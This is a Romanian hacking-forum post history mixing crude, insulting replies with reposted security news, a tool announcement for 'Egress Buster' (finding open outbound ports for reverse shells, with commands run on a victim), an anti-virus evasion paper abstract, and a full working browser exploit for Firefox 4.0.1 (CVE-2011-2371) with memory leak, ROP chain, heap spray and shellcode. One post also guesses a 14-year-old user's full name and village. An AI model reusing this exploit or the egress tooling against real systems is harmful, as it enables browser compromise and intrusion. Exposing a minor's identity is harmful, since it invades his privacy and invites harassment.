Nytro

E scris cu picioarele, o gramada de porcarii, nu e tocmai o sursa din care sa ai ce invata. PS: Linux pe 64 de biti?

Spune si care sunt diferentele intre "union" si "union all", intre "into outfile" si "into dumpfile", cum verifici privilegiile, ce faci daca directorul nu e writeable, sau nu ai calea directa, de ce e acel "+" la final, ce inseamna pentru browser, de ce folosesti hex la Load File cand la codul PHP se vede ca nu se face escape la ghilimea, ce se poate face daca functia system e in lista de "disabled_functions" si... de ce folosesti Internet Explorer?

Ce penal

BackTrack 5 R2 Released

1. Remote Desktop Protocol - Wikipedia, the free encyclopedia 2. Vezi link-ul de la pasul 1, intrebarea e irationala, RDP e un protocol 3. Simple Mail Transfer Protocol - Wikipedia, the free encyclopedia 4. Cred ca vrei sa spui Server SMTP, server care implementeaza PROTOCOLUL SMTP 5. Poti trimite mail-uri PS: Eu ti-am raspuns la intrebari, pentru cei care se ocupa cu asa ceva, acesti termeni au alte conotatii. Nu te astepta la raspunsuri relevante de la aceste persoane, pot sa jur ca nu exista aici 2-3 persoane care sa citeasca despre protocolul SMTP sau RDP, ei doar folosesc niste programe chioare, nu inteleg cum functioneaza protocolul in sine, e ca si cum ai intra intr-un bloc si ai incerca cateva chei la anumite usi, nu conteaza ca nu stii cum functioneaza acea usa, tu doar incerci, si daca ai noroc, te poti lauda (desi nu ai cu ce) ca esti "hacker" si ca ai spart servere (spun asta pentru ca aceleasi principii se aplica si la SSH, care da, si el tot un protocol este). NB: Communications protocol - Wikipedia, the free encyclopedia Fii tu unul dintre acele persoane care cunoaste sistemul de inchidere al unei usi, daca tot vrei sa fii un... "deschizator de usi".

Traducere de cacat, "seized" inseamna "confiscat" in germana.

[h=1]Loophole in iOS Allows Developers Access to Users’ Photos[/h]February 29, 2012, 2:29PM by Christopher Brook A recently discovered hole in Apple's iOS allows third-party developers access to users’ iPhone, iPad or iPod Touch photos by exploiting the device’s location data, according to a report from the New York Times’ Nick Bilton on the Bits blog yesterday. The loophole lies in the way that applications use certain photo location data. Assuming an iPhone user approves any app that accesses the location data of photos, the app’s developers will be able to capture any of the users’ images while that app is open. The Times had an unnamed developer create a proof of concept application app to do just this, according to the blog post. The app, called PhotoSpy, was never submitted to the App Store for approval but asked users for access to location data. After granting it, the app began transferring photos and location data from the phone to a remote server. Apple first allowed apps access to photo libraries in 2010 with the fourth build of their operating system. The move was intended to allow photo apps better access to let users share and edit photos. While Apple didn't immediately respond to a request for comment on Wednesday, they have gone on record regarding any apps that may use a users' contact information without notification: “Apps that collect or transmit a user’s contact data without their prior permission are in violation of our guidelines,” Apple's Tom Neumayr told the Wall Street Journal's AllThingsD blog earlier this month. The news comes two weeks after it was discovered that Twitter and other apps were uploading users’ contact lists to remote servers without their knowing. Path, a social network that encourages users to share photos and message each other was criticized earlier this month after a researcher found the company’s app uploading users’ address books to the company without notification. Sursa: Loophole in iOS Allows Developers Access to Users’ Photos | threatpost

A walk through the expo at RSA Conference 2012, part two Posted on 29 February 2012. The expo floor at this year's RSA Conference is bigger than ever, with numerous companies exhibiting for the first time. Here's another look at the show floor, with more interesting booths. For up-to-date conference news and photos check out our dedicated coverage page for RSA Conference 2012. The extensive EMC booth dominates one of the rows. Sensage in the middle of a discussion. Presentation in progress at the Wave Safend booth. The Tenable Security space. FireHost briefing potential customers. The busy Arbor Networks booth. Something grabbed this gentleman's attention. The Check Point booth. Sursa: A walk through the expo at RSA Conference 2012, part two

[h=1]Roboscan Internet Security – Suita de securitate gratuita cu motor dual: BitDefender si Tera[/h] By Radu FaraVirusi(com) on February 29, 2012 O noua suita de securitate gratuita isi face aparitia pe piata Roboscan Internet Security Free. In ceea ce priveste componenta Antivirus foloseste doua motoare: BitDefender si Tera. Astfel, puteti avea protectie de top impotriva malware-ului de orice tip, alaturi de un firewall decent. La o prima impresie, are un consum foarte mic de resurse: 18 MB RAM, iar detectia este una foarte buna. Astfel, se constituie intr-un competitor serios pentru celelalte produse gratuite de securitate deja existente pe piata. Iata mai jos cateva screenshot-uri, urmate de link-ul de descarcare. Pentru a-l descarca accesati link-ul: Roboscan Sursa: Roboscan Internet Security – Suita de securitate gratuita cu motor dual: BitDefender si Tera

[h=4]Hitb2011Kul - Mobile Malware Analysis[/h] Description: Mobile Malware Analysis Sursa: Hitb2011Kul - Mobile Malware Analysis

[h=4]Hitb2011Kul - Reverse Engineering Android Malware[/h] Description: Reverse Engineering Android Malware Android is growing at such an explosive rate, and users are storing an increasing amount of important data on their mobile phones, thus the platform is an attractive target for malware author. Malware author are aiming for users of Google's Android mobile operating system with a malicious application that harvests personal information, controlling the system and sends it to a remote server. By utilizing SMS toll fraud; malware author will also steal money from infected mobile phone. Malware infection on Android platform is going to be interesting in future (it's happening now!). Thus, reversing Android Malware (Droid-ware) is interesting challenge to address. Malware analysis can be performed using two approaches, which is Dynamic Analysis and Dead-Listing Analysis (Reverse Engineering). Reverse engineering is a vitally important skill for today's expert security professional. In this presentation, we'll focus on the later approach to analyze Android Malware. In this talk, the speaker will discuss on recent progress on Android malware scene. The speaker will provide details on few recent Android Malware samples. The speaker will also discuss on technical analysis on malicious Android applications by using reversing engineering approach. The analysis parts will focus on dissecting obfuscation such as encryption, string optimizing and generic obfuscation techniques applied inside Android Malware. The challenges when dealing with reversing Android Malware will be addressed as well. About Mahmud Ab Rahman Mahmud Ab Rahman currently works as Information Security Specialist for Malaysia Computer Emergency and Response Team (MyCERT) under umbrella of CyberSecurity Malaysia. Prior to that, he worked as an Intrusion Analyst at MyCERT department. His education background comprises of Master Degree in Computer Science from National University of Malaysia in 2006. Prior to that, he obtained a Degree in Computer Science from the same university. Mahmud has been involved in the computer security field for over 5 years. His area of focus and interest is network security, honeynet, botnet monitoring, and malware analysis. He also engages in several large scale penetration-testing exercises and to provide solutions for any vulnerability detected. Moreover, he is recognized for conducting numbers of training for organizations to talk on topics ranging from introduction to advanced security courses. He is a occasional speaker at conferences such as FIRST AGM, FIRST TC,Honeynet Annual Workshop and Infosec.MY. He currently certified for SANS's GPEN (gold) and GREM. Sursa: Hitb2011Kul - Reverse Engineering Android Malware

[h=1]First beta for GNOME 3.4[/h]27 February 2012, 12:19 The GNOME project has released the first beta of GNOME 3.4, officially labelled GNOME 3.3.90 beta. This marks the development of the desktop environment moving into the home stretch and there should be no major changes from this point on because, among other things, the feature freeze was put in place a week ago. The first beta implements a range of improvements to the core components and applications that make up the GNOME desktop. For example, the updated version of NetworkManager includes basic support for VLANs and bonded network ports. The GNOME shell and screensaver now use systemd to obtain information on active users of the system and their input devices rather than, as at present, using ConsoleKit. The previously developed Redo function in Nautilus, the streamlined web browser, and the new virtualisation and remote desktop software, GNOME Boxes, are also part of the beta. According to the schedule, GNOME 3.4 is scheduled for release on 28 March. Before then, another beta and a release candidate will appear. (djwm) Sursa: First beta for GNOME 3.4 - The H Open Source: News and Features

[h=2]New tool release – “Egress Buster” – Find outbound ports[/h]February 29th, 2012 A friend was recently on a penetration test and needed a port on the outside. I haven’t found any decent tools out there for finding what ports are allowed outbound to help with reverse shells and stuff like that so I wrote one real quick. Note that this was written in about 15 minutes and the code can absolutely be improved. I’ll probably go back and clean it up sometime. There are some limitations, for one, operating systems in general start to puke when you generate over a 1000 listeners, so you will need to test a 1000 at at time. Good news is the socket handlers are multi-threaded so you can cycle through about a 1000 ports in well under a minute. Here’s the general concept: You are on the inside network somehow and need to find what ports are allowed out to the Internet. There’s two main files/components – egressbuster and egress_listener. Egressbuster connects out on whatever ports you specify and tries to connect to an Internet facing computer thats running egress_listener. Very simple to run: On victim: egressbuster.exe example: egressbuster.exe 208.1.1.1 1-1000 In the above example, we specify a low port range and high port range, egressbuster will attempt to connect from port 1 to 1000 outbound to wherever the reverse_listener is. The listener: python egress_listener.py example: python egress_listener.py 1-1000 In the above example, we just specify what ranges we need to listen to. In the above example we listen from 1 to 1000 for incoming connections. When a connection is established, this is what you'll see on the listener side. 192.168.235.131 connected on port: 170 192.168.235.131 connected on port: 171 192.168.235.131 connected on port: 172 192.168.235.131 connected on port: 173 192.168.235.131 connected on port: 174 192.168.235.131 connected on port: 175 192.168.235.131 connected on port: 176 192.168.235.131 connected on port: 177 192.168.235.131 connected on port: 178 If your interested, download the byte compiled code and the python source here. Download: https://www.secmaniac.com/files/egressbuster.zip Sursa: https://www.secmaniac.com/blog/2012/02/29/new-tool-release-egress-buster-find-outbound-ports/

Metasploit - Low Level View Saad Talaat (saadtalaat _ gmail.com) Forward Abstract: for the past decade (almost) Metasploit have been number one pentesting tool. A lot of plug-ins have been developed specially for it. However, the key-point of this paper is to discuss metasploit framework as a code injector and payload encoder. Another key-point of this paper is malware different forms and how to avoid anti-viruses which have been a pain for pentesters lately. And how exactly anti-malware software work. Introduction Evading anti-viruses have been a painful issue for pentesters for years. On the other hand a birth of an anti-virus evading technique means blackhats and skiddies will have another way to hack without being detected. Over the years metasploit framework have been working in one technique on evading anti-viruses which is encoding. For a year or two some encoding techniques worked fine. Nowadays It's nearly impossible to get encoded payload that evades anti-virus from metasploit's encoders no matter how many iterations you do. Download: [URL]http://cdn01.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf[/URL]

Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit <!--Full Exploit Code: http://www.exploit-db.com/sploits/18531.zip PoC exploit for CVE-2011-2371 tested against Firefox 4.0.1 md5 of mozjs.dll: 5d7ffcc9deb5bb08417ceae51d2afed4 change constants to switch between w7/xp. see my blog if you want to know how this works. http://gdtr.wordpress.com/2012/02/22/exploiting-cve-2011-2371-without-non-aslr-modules/ p_k twitter.com/pa_kt gdtr.wordpress.com --> <html> <script src="jspack.js"></script> <script> function hex(x){ var y = x.toString(16); y = "0x"+y; return y; } function itoa(i) { return String.fromCharCode(i); } // n - length in bytes (1 unicode char = 2 bytes) function puff(x, n){ while(x.length < n) x += x; return x.substring(0,n); } function arr2hex(tab){ var s = ""; for(var i in tab){ x = tab[i]; x = x.toString(16); if(x.length<2) x = "0"+x; s += x + " "; } return s; } function arr2ascii(tab){ var s = "" for(var i in tab){ x = tab[i]; if(0x20 <= x && x<=0x7f){ y = itoa(x); } else{ y = "."; } s += y; } return s; } function xchg(d,i,j){ t = d[i]; d[i] = d[j]; d[j] = t; } function bswap(d){ xchg(d, 0, 3); xchg(d, 1, 2); } function nicer(tab){ jsp = new JSPack(); res = []; for(var i in tab){ x = tab[i]; t = jsp.Pack("d", [x]); d1 = t.slice(0, 4); d2 = t.slice(4, 8); bswap(d1); bswap(d2); t = [d1,d2]; res = res.concat(t); } res = res.reverse(); return res; } function dw2int(d){ n = 0; for(var i=0;i<4;i++){ n *= 256; n += d[3-i]; } return n; } function convert(tab){ o = s = v = ""; for(var i in tab){ d = tab[i]; s += arr2hex(d); v += arr2ascii(d); if((parseInt(i)+1)%4==0){ o += s + " | " + v + "\n"; s = ""; v = ""; } } return o; } function check_pair(d1, d2){ var n1 = dw2int(d1); var n2 = dw2int(d2); if(n2-n1 == 0x304) return true; return false; } function find_mozjs_base(tab){ var n1 = 0; for(var i=0;i<tab.length-4;i++){ d1 = tab[i]; d2 = tab[i+1]; if(check_pair(d1,d2)){ n1 = dw2int(d1); n1 = n1 - 0x3cac; //n1 = mozjs .data n1 = n1 - 0x1B2000; //n1 = mozjs base break; } } return n1; } function d2u(dword){ var uni = String.fromCharCode(dword & 0xFFFF); uni += String.fromCharCode(dword>>16); return uni; } function odd_d2u(d1, d2){ uni = String.fromCharCode((d1&0xFF)<<8); uni += String.fromCharCode((d1>>8)&0xFFFF); uni += String.fromCharCode((d1>>24)+((d2 & 0xFF)<<8)); //1+1<<8 == 512 in JS T_T uni += String.fromCharCode((d2>>8)&0xFFFF); uni += String.fromCharCode(d2>>24); return uni; } // generated with mona.py function rop_chain(mozjs_base){ var arr = [ mozjs_base + 0x000c96e6, // POP EAX // RETN [mozjs.dll] mozjs_base + 0x0015d054, // ptr to &VirtualAlloc() [IAT mozjs.dll] mozjs_base + 0x00028510, // MOV EAX,DWORD PTR DS:[EAX] // RETN [mozjs.dll] mozjs_base + 0x0014293c, // XCHG EAX,ESI // RETN [mozjs.dll] mozjs_base + 0x0014d00d, // POP EBP // RETN [mozjs.dll] mozjs_base + 0x000d7ee2, // & push esp // ret 04 [mozjs.dll] mozjs_base + 0x000be327, // POP EBX // RETN [mozjs.dll] 0x00000001, // 0x00000001-> ebx mozjs_base + 0x0004f422, // POP EDX // RETN [mozjs.dll] 0x00001000, // 0x00001000-> edx mozjs_base + 0x000b1421, // POP ECX // RETN [mozjs.dll] 0x00000040, // 0x00000040-> ecx mozjs_base + 0x000062e3, // POP EDI // RETN [mozjs.dll] mozjs_base + 0x0000f005, // RETN (ROP NOP) [mozjs.dll] mozjs_base + 0x000652f0, // POP EAX // RETN [mozjs.dll] 0x90909090, // nop mozjs_base + 0x001372bd // PUSHAD // RETN [mozjs.dll] ]; return arr; } function tab2uni(tab){ var uni = "" for(var i=0;i<tab.length;i++){ uni += d2u(tab[i]); } return uni; } function spray(mozjs_base, h1_s, hsize) { function rva2va(addr) { return addr+mozjs_base; } function rva2d(addr) { return d2u(rva2va(addr)); } var align = 0x100000; var tab_offset = 0x1000; var TYPE_OBJECT = "%u0007%uffff"; var pivot_rva = 0x1a21c; // 0x68e7a21c : # ADD EBP,EBX # PUSH DS # POP EDI # POP ESI # POP EBX # MOV ESP,EBP # POP EBP # RETN var mov_esp_ebp_rva = 0x1a222; // mov esp, ebp # pop ebp # ret var h2_s = h1_s + hsize; var h2_middle = (h2_s + hsize/2) & (~(align-1)); //align //mov eax,dword ptr [edi+64h] ;edi=[h2_ptr+4], later: call eax var h2_ptr = h2_middle + tab_offset; var off1 = h2_ptr; var off2 = h2_ptr-0x64; var v1 = d2u(off1); var h1_fill = unescape(v1+TYPE_OBJECT); var foo = puff(h1_fill, 0x4000); var h1_spray = foo.substring(0,(0x4000/2)-2); var pivot_va = rva2va(pivot_rva); pivot_va = d2u(pivot_va); off2 = d2u(off2); var new_ebp = h2_ptr+18; var mov_esp_ebp_va = rva2va(mov_esp_ebp_rva); var set_esp = odd_d2u(new_ebp, mov_esp_ebp_va); var rop = tab2uni(rop_chain(mozjs_base)); //shellcode by skylined var msgbox_shellcode = "%uf631%u6456%u768b%u8b30%u0c76%u768b%u8b1c%u086e%u368b%u5d8b%u8b3c%u1d5c%u0178%u8beb%u184b%ue367%u8bec%u207b%uef01%u7c8b%ufc8f%uef01%uc031%u3299%u6617%ucac1%uae01%uf775%u8166%u2afa%u74b6%u6609%ufa81%u1aaa%udbe0%uc575%u538b%u0124%u0fea%u14b7%u8b4a%u1c7b%uef01%u2c03%u8597%u74f6%u6812%u3233%u2020%u7568%u6573%u5472%ud5ff%u3195%uebf6%u56a3%u3168%u0021%u6800%u322d%u3733%u3268%u3130%u6831%u7663%u2d65%u8754%u2404%u5050%uff56%uccd5"; var x = unescape(pivot_va+off2+set_esp+"%u1111%u2222"+rop+msgbox_shellcode); x = puff(x, 0x4000); var h2_spray = x.substring(0,(0x4000/2)-2); var spray_tab = new Array(); for (i=0;i<0x1000;i++){ spray_tab[i] = h1_spray+"1"; spray_tab[i].indexOf("zzz"); } for (i=0x1000;i<0x2000;i++){ spray_tab[i] = h2_spray+"2"; spray_tab[i].indexOf("zzz"); } } var exploit_func = function bleh(prev, current, index, array) { //boom = typeof current; current[4] = 1; // add ebp, ebx, where ebx=2*4+1=9 //throw "up"; } function trigger(func, arr_len){ xyz.length = arr_len; try{ xyz.reduceRight(func,1,2,3); } catch(e){ } } function leak(){ var CHUNK_SIZE = 0x1000; var leak_arr_len = 0xffffffff; mem = []; count = 0; var leak_func = function bleh(prev, current, index, array) { if(typeof current == "number"){ mem.push(current); } count += 1; if(count>=CHUNK_SIZE/8){ throw "lol"; } } function dump_mem(leak_f, arr_len){ var dump = document.getElementById("dump"); var mozjs_base = 0; for(var i=0;;i++){ mem = []; count = 0; trigger(leak_f, arr_len); mem = nicer(mem); s = convert(mem); dump.innerHTML = s; //alert("leaked bytes: "+hex(mem.length*4)); mozjs_base = find_mozjs_base(mem); //alert("mozjs base: "+hex(mozjs_base)); if(mozjs_base != 0){ break; } } return mozjs_base; } var base = dump_mem(leak_func, leak_arr_len); return base; } function go(){ //var arr_ptr = 0x05000000; //(xp sp3) //var h1_s = 0x05b00000; //var h2_e = 0x0fb00000; var arr_ptr = 0x0b000000; //w7 var h1_s = 0x0b500000; var h2_e = 0x16e00000; var size = h2_e-h1_s; var hsize = size/2; var h1_middle = h1_s+hsize/2; var exp_arr_len = (h1_middle - arr_ptr)/8 + 0x80000000; var mozjs_base = leak(); spray(mozjs_base, h1_s, hsize); alert("ready"); while(1){ trigger(exploit_func, exp_arr_len); exp_arr_len -= 0x500; } } // globals var xyz = new Array(); </script> <body> <input type="button" value="go" onclick="go()" /> <pre id="dump"> </pre> </body> </html> Sursa: Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit

Cei cu crash-ul, ia sa vad, cum crashuiti voi Chrome? Scrieti o pagina HTML sau un cod Javascript care sa crashuiasca Chrome...

Si cica Parlamentul European vrea sa opreasca aceste "atacuri" pentru A PROTEJA DREPTURILE PROGRAMATORILOR, cand ei ofera o gramada de bani tocmai pentru a "incalca" acest drept. Muie parlamentarilor de peste tot. Sunt foarte mici sansele sa reuseasca cineva ceva. Doar cei de la VUPEN au reusit, unde sunt oameni cu adevarat "bazati", oameni care castiga rapid acei 60.000 de dolari si care poate nici nu s-ar obosi sa se deplaseze pentru aceasta suma.

Banul nu se scoate indiferent cati "prieteni" de pe messenger de-ai tai s-ar da cu curul de paman. Moderatorii nu o sa scoata banul pentru ca raman fara moderator. Iar tu ban, sunt interzise conturile multiple, si mi se lua de acest tam-tam. Daca se mai trezeste unul sa comenteze urmeaza pe lista de banati. Nu va convine va dati cu curul de pamant.

Nu stiu cine esti si de ce ai postat aici, nu iti dadeam ban, dar e RST nu RTS, asa ca "La revedere".

Muie Parlamentului European. Daca ma gandesc la Romania, ce astfel de parlamentari are, orice cuvinte sunt inutile... Astia sunt prosti de bubuie. Practic "programatorii" nu vor aceste legi tampite, NU e spre binele lor, e inca o tentativa de control in masa.

ID: mafteiliviu14, deci il cheama Mafei Liviu si are 14 ani (sunt un geniu, stiu) si e din Neamt, comuna Urecheni. De ce nu fac cacaturi ca acesta oameni din Bucuresti, sa putem merge peste ei acasa?

Thanks. O recomand tuturor care au o parere buna despre ei, e demonstratia perfecta pentru ceea ce inseamna hacking. PS: Daca vreti cartea (tiparita) dati si voi o bere si o imprumut.

Nu e nevoie sa posteze, vreau doar sa citeasca, si sa realizeze ca dupa 13 ani de la aparitia acestui fenomen, au inceput sa apara persoane auto-intitulate "hackeri" doar pentru ca presupun ca inteleg aceasta tehnica. O sa postez diseara niste articole interesante, sa inteleaga lumea ca la capitolul SQLI suntem cu vreo 8 ani in urma...

Descarcam si eu cand nu aveam ce face: Mirror: [URL]https://rstcenter.com/videos/Debugging/[/URL]

On Christmas day, 1998 Phrack 54 was issued. Phrack[1], is a “Hacker magazine written by the community, for the community”. It is an excellent source of technical security information and in this particular edition, 54, there was an article entitled “NT Web Technology Vulnerabilities” written by rfp – or rain forest puppy. Amongst other things this article described a number of attacks that employed SQL injection, though at no point is this term used in the article. rfp discusses IDC and ASP applications running on Microsoft’s Internet Information Server feeding into SQL Server 6.5. This article is the first real public outing of SQL injection – it just wasn’t called SQL injection at that time. That would come later. Next of note was a security advisory published by Allaire[2] on February the 4th 1999, a little over a month after rfp’s article. The security bulletin discusses the threat posed by “Multiple SQL Statements in Dynamic Queries”. Link: http://phrack.org/issues.html?issue=54&id=8#article Cititi, si nu uitati ca a fost scris in 1998...